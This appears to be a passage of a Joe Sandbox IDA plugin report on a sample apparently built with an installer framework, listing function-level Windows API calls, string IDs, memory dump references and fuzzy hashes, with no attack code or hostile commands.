                                                                                        • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                        • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                        • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                        • API String ID: 190572456-212574377
                                                                                        • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                        • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                        • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                        • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                        • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                          • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                          • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                          • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                        • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                        • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                        • API String ID: 142928637-2676053874
                                                                                        • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                        • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                        • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                        • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                        • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                        • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                        • API String ID: 2238633743-1050967733
                                                                                        • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                        • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                        • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                        • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                        • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                        • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                        • API String ID: 667068680-222143506
                                                                                        • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                        • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                        • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                        • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                        APIs
                                                                                        • GetFocus.USER32 ref: 0041B57E
                                                                                        • GetDC.USER32(?), ref: 0041B58A
                                                                                        • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                        • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                        • String ID:
                                                                                        • API String ID: 2502006586-0
                                                                                        • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                        • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                        • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                        • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                        APIs
                                                                                        • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                        • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                        • API String ID: 1452528299-1580325520
                                                                                        • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                        • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                        • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                        • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                        • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDeviceMetricsSystem$Release
                                                                                        • String ID:
                                                                                        • API String ID: 447804332-0
                                                                                        • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                        • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                        • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                        • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                        APIs
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                        • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                        • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$Show
                                                                                        • String ID:
                                                                                        • API String ID: 3609083571-0
                                                                                        • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                        • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                        • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                        • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                        APIs
                                                                                          • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                        • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                        • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                          • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                        • String ID:
                                                                                        • API String ID: 3527656728-0
                                                                                        • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                        • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                        • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                        • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFileHandle
                                                                                        • String ID: !nI$.tmp$_iu
                                                                                        • API String ID: 3498533004-584216493
                                                                                        • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                        • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                        • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                        • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                        APIs
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                          • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                          • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                        • String ID: .dat$.msg$IMsg$Uninstall
                                                                                        • API String ID: 3312786188-1660910688
                                                                                        • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                        • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                        • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                        • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                        • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                        • API String ID: 828529508-2866557904
                                                                                        • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                        • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                        • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                        • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                        APIs
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                        • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                        • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                        • API String ID: 2573145106-3235461205
                                                                                        • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                        • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                        • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                        • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                        • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                        • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                        • API String ID: 3478007392-2498399450
                                                                                        • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                        • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                        • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                        • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                        APIs
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
